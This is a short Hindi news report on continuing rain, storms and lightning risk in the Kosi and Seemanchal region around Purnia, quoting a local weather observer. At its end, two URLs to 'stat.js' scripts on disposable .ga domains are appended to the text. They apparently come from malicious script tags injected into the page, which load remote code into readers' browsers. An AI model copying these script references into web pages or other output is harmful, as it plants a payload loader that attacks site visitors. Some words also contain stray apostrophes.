कोसी और सीमांचल के जिलों सहित आसपास के इलाकों में फिलहाल मौसमी हालात खराब ही रहेंगे. बीते दो दिनों से इलाके में लगातार बारिश जारी है और मौसम खराब है. इससे पहले लगभग डेढ से दो महीने तक के बीच आये दिनों ऐसे ही हालात रहे हैं. फिलहाल मौसम विभाग ने इलाके के 48 घंटे की मौसमी चे’तावनी जारी कर रखी है।
यानी एक जून तक इलाके का मौसम बदलता रहेगा. पूर्णिया और आसपास के मौसमी मिजाज को लेकर स्थानीय मौसम केन्द्र के पर्यवेक्षक सुमन कुमार ने कहा कि इलाके में अभी एक सप्ताह तक मौसम में खास सुधार नहीं होगा। बीते 24 घंटे में पूरे इलाके में 25 से 35 एमएम के बीच वर्षा रिकार्ड की गयी है और,
आने वाले दिनों में आंधी, पानी, ओलावृष्टि और व’ज्रपात का खतरा बना हुआ है. मौसम पर्यवेक्षक कहते हैं कि बंगाल की खाड़ी और उत्तर की शिवालिक पर्वतश्रेणियों से सीमांचल की भौगोलिक दूरी काफी कम है, इस वजह से इस इलाके में मौसमी मिजाज अधिक बदलते हैं. इसकी वजह इलाके का न्यूनतम वायुदाब का होना है.https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms